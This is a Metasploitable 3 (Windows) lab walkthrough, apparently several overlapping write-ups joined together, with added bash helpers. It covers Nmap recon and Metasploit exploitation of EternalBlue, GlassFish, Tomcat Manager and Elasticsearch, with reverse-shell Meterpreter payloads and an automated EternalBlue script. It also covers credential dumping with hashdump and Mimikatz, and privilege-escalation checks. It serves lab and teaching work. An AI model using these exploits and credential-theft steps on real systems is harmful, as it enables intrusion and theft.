Metasploitable 3 (Windows) is a deliberately vulnerable virtual machine based on Windows Server 2008 R2, designed to provide a safe, legal environment for practicing offensive security. Unlike its predecessor, it is built from Rapid7's GitHub repository using automation tools (Packer and Vagrant) rather than downloaded as a finished image.

1. Lab Setup and Deployment
To build the Windows environment you need a hypervisor (VirtualBox is the usual choice) plus the automation tools the build scripts drive.

Prerequisites: VirtualBox, Vagrant and Packer installed on the host.
Build: Clone the repository and run build_win2008.ps1 (on Windows) or build_win2008.sh (on Linux/macOS).
Deployment: After the build completes, run vagrant up to launch the VM.
Credentials: The default login for the machine is vagrant / vagrant.

2. Reconnaissance and Scanning
Once the VM is live, the first step is identifying its IP address and open services.

Network Discovery: Use netdiscover or an Nmap ping sweep (nmap -sn [network]) to find the target's IP.
Service Enumeration: Perform a comprehensive Nmap scan to identify vulnerable services: nmap -Pn -sV -p- [target-ip]
Target Ports: Key ports often found open include 9200 (Elasticsearch).

3. Exploitation Scenarios
Metasploitable 3 includes multiple "flags" and vulnerabilities that range from misconfigurations to critical remote code execution (RCE) flaws.
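As an added example (mine, not part of the original page), the script below turns a grepable Nmap scan of the target into a list of candidate entry points, using the Metasploit modules this page works through. The scan text embedded in it is constructed to resemble nmap -sV -p- -oG - output for a Metasploitable 3 host at 192.168.56.105 (an assumed lab address); the port-to-vector mapping is my own judgement, and the Elasticsearch module name, exploit/multi/elasticsearch/script_mvel_rce, is the one Metasploit uses for CVE-2014-3120.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough: triage a grepable Nmap
# scan (nmap -sV -p- -oG -) of Metasploitable 3 (Windows) into candidate
# entry points. The scan text below is CONSTRUCTED; 192.168.56.105 is an
# assumed lab address.
set -eu

sample_gnmap() {
  # CONSTRUCTED sample of grepable output. Real output has one "Host:" line per
  # target; fields are tab-separated and each port is "port/state/proto//svc//version/".
  printf '# Nmap 7.94 scan initiated as: nmap -sV -p- -oG - 192.168.56.105\n'
  printf 'Host: 192.168.56.105 ()\tPorts: %s\tIgnored State: filtered (65527)\n' \
    '21/open/tcp//ftp//Microsoft ftpd/, 22/open/tcp//ssh//OpenSSH 7.1/, 80/open/tcp//http//Microsoft IIS httpd 7.5/, 445/open/tcp//microsoft-ds//Windows Server 2008 R2 microsoft-ds/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Service/, 4848/open/tcp//ssl|http//Oracle GlassFish 4.0/, 8080/open/tcp//http//Oracle GlassFish 4.0/, 8282/open/tcp//http//Apache Tomcat|Coyote JSP engine 1.1/, 9200/open/tcp//http//Elasticsearch REST API 1.1.1/'
  printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
}

open_ports() {
  # Read grepable Nmap output on stdin; print "port<TAB>service<TAB>version"
  # for every open TCP port.
  awk -F'\t' '/^Host:/ {
    for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
    n = split(ports, p, ", ")
    for (j = 1; j <= n; j++) {
      split(p[j], f, "/")
      if (f[2] == "open" && f[3] == "tcp") print f[1] "\t" f[5] "\t" f[7]
    }
  }'
}

triage_ports() {
  # Read grepable Nmap output on stdin; print "port<TAB>service<TAB>next step".
  # The mapping is the attacker's judgement, not anything Nmap reports.
  tab="$(printf '\t')"
  open_ports | while IFS="$tab" read -r port service version; do
    case "$port" in
      21)        hint='FTP: try anonymous login and the vagrant:vagrant default' ;;
      445)       hint='SMB: nmap --script smb-vuln-ms17-010, then exploit/windows/smb/ms17_010_eternalblue' ;;
      3389|5985) hint='RDP/WinRM: log in with any recovered credentials (vagrant:vagrant to start)' ;;
      4848|8080) hint='GlassFish: exploit/multi/http/glassfish_deployer against the admin console on 4848' ;;
      8282)      hint='Tomcat Manager: exploit/multi/http/tomcat_mgr_upload' ;;
      9200)      hint='Elasticsearch 1.1.x: exploit/multi/elasticsearch/script_mvel_rce (CVE-2014-3120)' ;;
      *)         hint="manual review ($version)" ;;
    esac
    printf '%s\t%s\t%s\n' "$port" "$service" "$hint"
  done
}

# With a real scan: nmap -sV -p- -oG - 192.168.56.105 | triage_ports
sample_gnmap | triage_ports
```

Anything not in the case table (22/ssh, 80/http here) falls through to "manual review" with the version string, which is the cue to check the specific build against searchsploit or Metasploit's search rather than guess.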
Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)
This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice.

1. Introduction to Metasploitable 3
Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on vulnerabilities found in Windows environments, specifically Windows Server 2008 R2, and is a useful playground for learning service exploitation, privilege escalation and lateral movement.

2. Lab Environment Setup
Before you begin, ensure your lab environment is ready:
Target: Metasploitable 3 (Windows)
Attacker: Kali Linux
Network: Put both VMs on the same Host-Only network so they can talk to each other while staying isolated from the internet. A VirtualBox NAT Network also lets them reach each other, but it still allows outbound internet access from the target unless you disable it.

3. Phase 1: Reconnaissance & Scanning
Start by identifying the target IP and open services.
Nmap Scan (run as root, since -O needs raw sockets): nmap -sV -sC -O -p- <Target_IP>
What to look for:
Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).
Port 445: SMB (potential for EternalBlue or share enumeration).
Port 3306: MySQL.
Port 9200: Elasticsearch.

4. Phase 2: Exploitation Vectors
Vector A: Exploiting HTTP (Port 8080 - GlassFish)
Metasploitable 3 ships with a GlassFish server, which is a common entry point.
Search for Exploits: In Metasploit, search for glassfish_deployer.
Configuration:
use exploit/multi/http/glassfish_deployer
set RHOSTS <Target_IP>
Note that this module deploys through the GlassFish admin interface, so it needs valid admin credentials and targets the admin port (4848 by default) rather than the 8080 HTTP listener.
Result: If successful, you gain a Meterpreter session.

Vector B: Exploiting SMB (Port 445)
Since this is an unpatched Windows Server 2008 R2 machine, it is very likely vulnerable to MS17-010 (EternalBlue).
Verify: use auxiliary/scanner/smb/smb_ms17_010, set RHOSTS and run; only proceed if it reports the host as vulnerable.
Exploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <Target_IP>
Result: This typically grants SYSTEM-level access immediately. The exploit is not always stable, so take a VM snapshot before running it; a failed attempt can blue-screen the target.

5. Phase 3: Post-Exploitation & Privilege Escalation
If you gained access as a low-privilege user (e.g., through a web app), you need to escalate.
Enumeration with Local Exploit Suggester: background your session (background, or Ctrl+Z), then:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
Common targets: look for the AlwaysInstallElevated registry values (escalation works only when both the HKLM and the HKCU value are set to 1) and for unquoted service paths that contain spaces.

6. Phase 4: Looting and Persistence
Once you have admin/SYSTEM access:
Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.
Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.
Flags: Search the Administrator desktop and the C:\ root for "flags" (usually .txt files) to complete the challenge.

7. Summary of Key Vulnerabilities
Vulnerability                               Metasploit Module
SMB (MS17-010)                              exploit/windows/smb/ms17_010_eternalblue
Elasticsearch RCE (CVE-2014-3120)           exploit/multi/elasticsearch/script_mvel_rce
ManageEngine Desktop Central (web server)   exploit/windows/http/manageengine_connectionid_write

Conclusion
Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and for understanding how misconfigured Windows services lead to full system compromise. Always document your steps, as the goal is to improve your reporting as much as your hacking.
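The two manual checks named in Phase 3 (AlwaysInstallElevated and unquoted service paths) can be scripted. The following is an added example of mine, not code from the write-up: it analyses output collected from the target with wmic service get Name,PathName,StartMode /format:csv and reg query of the two AlwaysInstallElevated values (run from a Meterpreter shell and copied back to Kali) and flags both conditions. The service list and registry output embedded below are constructed; the service names in them are placeholders, not services from the VM.

```bash
#!/usr/bin/env bash
# Added example, not from the write-up: offline analysis of enumeration
# output copied from the target. All inputs below are CONSTRUCTED placeholders.
set -eu

sample_services_csv() {
  # CONSTRUCTED output of:  wmic service get Name,PathName,StartMode /format:csv
  # (wmic prints a blank line, a header, then one CRLF-terminated row per service)
  cat <<'EOF'

Node,Name,PathName,StartMode
TARGET,ExampleAgent,C:\Program Files\Example Agent\agent.exe,Auto
TARGET,Dhcp,C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted,Auto
TARGET,ExampleSearch,"C:\Program Files\Example Search\search.exe" //RS//ExampleSearch,Auto
TARGET,ExampleWeb,C:\web\bin\httpd.exe -k runservice,Auto
EOF
}

unquoted_service_paths() {
  # Read the wmic CSV on stdin; print "Name<TAB>PathName" for services whose
  # executable path (the part up to and including .exe, so trailing arguments
  # do not count) is unquoted, contains a space, and lies outside C:\Windows.
  # Windows tries "C:\Program.exe", "C:\Program Files\Example.exe", ... before
  # the real binary, so a writable parent directory yields execution as the
  # service account.
  tr -d '\r' | awk -F',' '
    NF >= 4 && $1 != "Node" {
      path = $3
      lp = tolower(path)
      i = index(lp, ".exe")
      bin = (i > 0) ? substr(path, 1, i + 3) : path
      if (path !~ /^"/ && bin ~ / / && lp !~ /^c:\\windows\\/)
        print $2 "\t" path
    }'
}

# CONSTRUCTED output of:
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
SAMPLE_HKLM_ON='HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1'
SAMPLE_HKCU_ON='HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1'
SAMPLE_HKCU_OFF='HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0'

dword_is_one() {
  # Read one `reg query ... /v AlwaysInstallElevated` result on stdin.
  tr -d '\r' | grep -Eq 'AlwaysInstallElevated[[:space:]]+REG_DWORD[[:space:]]+0x1[[:space:]]*$'
}

always_install_elevated() {
  # $1 = HKLM query output, $2 = HKCU query output. Return 0 only when BOTH
  # values are 1: that is the condition under which msiexec installs any .msi
  # as SYSTEM, so a low-privilege user can package a payload as an MSI.
  printf '%s\n' "$1" | dword_is_one || return 1
  printf '%s\n' "$2" | dword_is_one || return 1
}

echo 'Unquoted service paths with spaces (candidate hijacks):'
sample_services_csv | unquoted_service_paths
if always_install_elevated "$SAMPLE_HKLM_ON" "$SAMPLE_HKCU_ON"; then
  echo 'AlwaysInstallElevated is 1 in HKLM and HKCU: an MSI payload will run as SYSTEM'
fi
```

The ExampleWeb row is the usual false positive: the path is unquoted and has a space, but only in the arguments after the .exe, so it is not hijackable and the check correctly skips it. Services under C:\Windows are skipped because that tree is not writable by ordinary users; a flagged path still needs a follow-up check that one of its parent directories actually is.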
Metasploitable 3 (Windows), built on Windows Server 2008 R2, is designed with numerous misconfigurations and unpatched services for security testing. The standard login for this VM is vagrant / vagrant.

Key Attack Vectors & Vulnerabilities
Here's a structured text walkthrough for attacking Metasploitable 3 (Windows target) using Metasploit. It assumes you have Metasploitable 3 (Windows Server 2008 R2) running and Kali Linux as the attacker.
Check vulnerability:
nmap --script smb-vuln-ms17-010 -p445 192.168.56.105
Exploit using Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10 # Kali IP
run
Once the Meterpreter session is open, enable RDP on the target for later graphical access (the vagrant / vagrant account is a local Administrator):
run post/windows/manage/enable_rdp
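To make the check-then-exploit sequence above repeatable, here is an added helper script of mine (not from the original walkthrough). It fires EternalBlue only when the Nmap script actually reports the host vulnerable, since the exploit can crash a host it does not fit, and drives msfconsole from a generated resource file with the same settings as the commands above. The Nmap output embedded for testing is constructed; the addresses 192.168.56.105 and 192.168.56.10 are the ones the commands above assume, and the live run is switched on with RUN_MS17=1 so the script can be sourced without touching the network.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough: gate the EternalBlue
# exploit on the Nmap smb-vuln-ms17-010 result and drive msfconsole from a
# generated resource script. Addresses follow the commands above.
set -eu

TARGET="${1:-192.168.56.105}"   # Metasploitable 3
LHOST="${2:-192.168.56.10}"     # Kali

# CONSTRUCTED samples of `nmap --script smb-vuln-ms17-010 -p445 <host>` output:
# the first is what the script prints for a vulnerable host, the second is a
# scan where the script produced no finding at all.
SAMPLE_VULN='PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143'
SAMPLE_NOT_VULN='PORT    STATE SERVICE
445/tcp open  microsoft-ds'

ms17_vulnerable() {
  # Read the Nmap output on stdin. Return 0 only when the script explicitly
  # reports "State: VULNERABLE"; no finding, a closed port or an unreachable
  # host all return 1, so the exploit never runs on a guess.
  grep -q 'State: VULNERABLE'
}

build_ms17_rc() {
  # Emit a Metasploit resource script equivalent to the interactive commands
  # above ($1 = RHOSTS, $2 = LHOST). `check` runs the module's own test first;
  # `exploit -z` leaves the new session backgrounded for post modules.
  cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $2
set LPORT 4444
check
exploit -z
EOF
}

main() {
  scan="$(nmap --script smb-vuln-ms17-010 -p445 "$TARGET")"
  if printf '%s\n' "$scan" | ms17_vulnerable; then
    rc="$(mktemp)"
    build_ms17_rc "$TARGET" "$LHOST" > "$rc"
    msfconsole -q -r "$rc"
    rm -f "$rc"
  else
    echo "$TARGET is not reported vulnerable to MS17-010; not exploiting." >&2
    exit 1
  fi
}

# Live run only on request: RUN_MS17=1 ./ms17_gate.sh 192.168.56.105 192.168.56.10
if [ "${RUN_MS17:-0}" = 1 ]; then
  main
fi
```

After the session appears, run post/windows/manage/enable_rdp against it as shown above; it is kept out of the resource script because it needs a live session ID.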
In the world of ethical hacking you need a safe, legal sandbox in which to test your skills. While Metasploitable 2 (Linux-based) has been the standard practice target for over a decade, Metasploitable 3 is its modern successor: a deliberately vulnerable Windows machine designed to teach real-world exploitation.
Unlike its predecessor, Metasploitable 3 runs Windows Server 2008 R2 (whichever hypervisor you host it on) and includes a large number of weaknesses: outdated software, weak passwords, misconfigured services, and unpatched kernel flaws.
This walkthrough guides you step by step through scanning and exploitation.
Disclaimer: This guide is for educational purposes only. Only test systems you own or have explicit permission to assess.
Nmap scan from Kali:
nmap -sV -sC -O -p- 192.168.56.102
Expected open ports (partial list):
135/tcp – MSRPC
139/tcp, 445/tcp – SMB
3389/tcp – RDP
5985/tcp – WinRM
8080/tcp – HTTP (GlassFish on this build)
47001/tcp – WinRM HTTP (the HTTP.sys listener WinRM registers)
49152-49156/tcp – RPC dynamic ports
This is a classic exploit: Tomcat is running on port 8282.
Open http://<Target_IP>:8282/manager/html in your browser and log in with Username: tomcat, Password: tomcat. You now have access to the Tomcat Manager, which accepts WAR deployments; we can use it to upload a malicious JSP payload.
Using Metasploit for the Tomcat exploit:
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run
Result: You should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. You have already won! But for the sake of learning, let's look at the next vector.